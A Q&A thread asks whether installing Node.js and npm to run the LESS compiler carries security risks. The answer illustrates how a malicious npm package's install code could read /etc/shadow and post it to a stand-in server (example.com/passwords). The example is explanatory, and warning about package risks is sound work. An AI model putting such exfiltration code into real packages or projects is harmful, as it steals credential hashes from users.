
Here's why I'm asking:

In order to use the lessc compiler under windows, I had to install Node.js and NPM based on this guide: http://lesscss.org/#getting-started

So basically, I just:

  1. Downloaded and installed Node.js from http://nodejs.org/
  2. Ran and installed lessc using npm install -g less

Detailed question:

Are there any security implications I should be aware of? Does Node.js open any ports? Does it run in the background? Does it auto-update?

Mario Awad
  • For all three questions the answer is "No". `Node` is just an "execution environment" for the scripts; it does nothing on its own. – seven-phases-max Nov 14 '14 at 11:14
  • Can you elaborate? What about NPM? Any resources to read more about the subject? Thanks. – Mario Awad Nov 14 '14 at 11:18
  • I suppose reading some tutorials on using `node`/`npm` should enlighten the key principles. In short, neither `node` nor `npm` run in the background; they also do not run/install any hidden services/drivers or any stuff of that kind at all. Everything they do is explicitly controlled by you when you run/launch the corresponding script/command/batch-file. (So it's just the same as with any other environment in general - it's all safe until you explicitly install/execute some `virii` tool/script). – seven-phases-max Nov 14 '14 at 11:28

1 Answer

Are there any security implications I should be aware of?

Yes, of course. As already pointed out by @seven-phases-max in the comments, the risk is that you run a script that is insecure or does anything that you do not want.

In the above you use the `-g` (global) flag when installing less, which means that you install less as superuser (administrator) on your system. As already explained here by @Explosion_Pills: "An installation can run arbitrary scripts and running it with sudo can be extremely dangerous!"

AFAIK everyone can publish a node module on npm, so I can publish a module and you install it, which for instance contains:

```javascript
// Illustration from the answer: a module's install-time code may read any file
// the installing user can read (with `-g`, that is often the administrator).
var request = require('request'),
    fs = require('fs');

// /etc/shadow is only readable by root on a Unix system, which is exactly the
// privilege a global (sudo) install hands to whatever the package runs.
fs.readFile('/etc/shadow', 'utf8', function (err, data) {
  if (err) {
    return console.log(err);
  }

  // Posts to a third-party server; the point is that an install script can
  // make arbitrary network requests without the user ever being asked.
  request.post(
    'http://www.example.com/passwords',
    { form: { key: 'value' } },
    function (error, response, body) {
      if (!error && response.statusCode == 200) {
        console.log(body);
      }
    }
  );
});
```

Also take a look at Node Security Project.

Bass Jobsen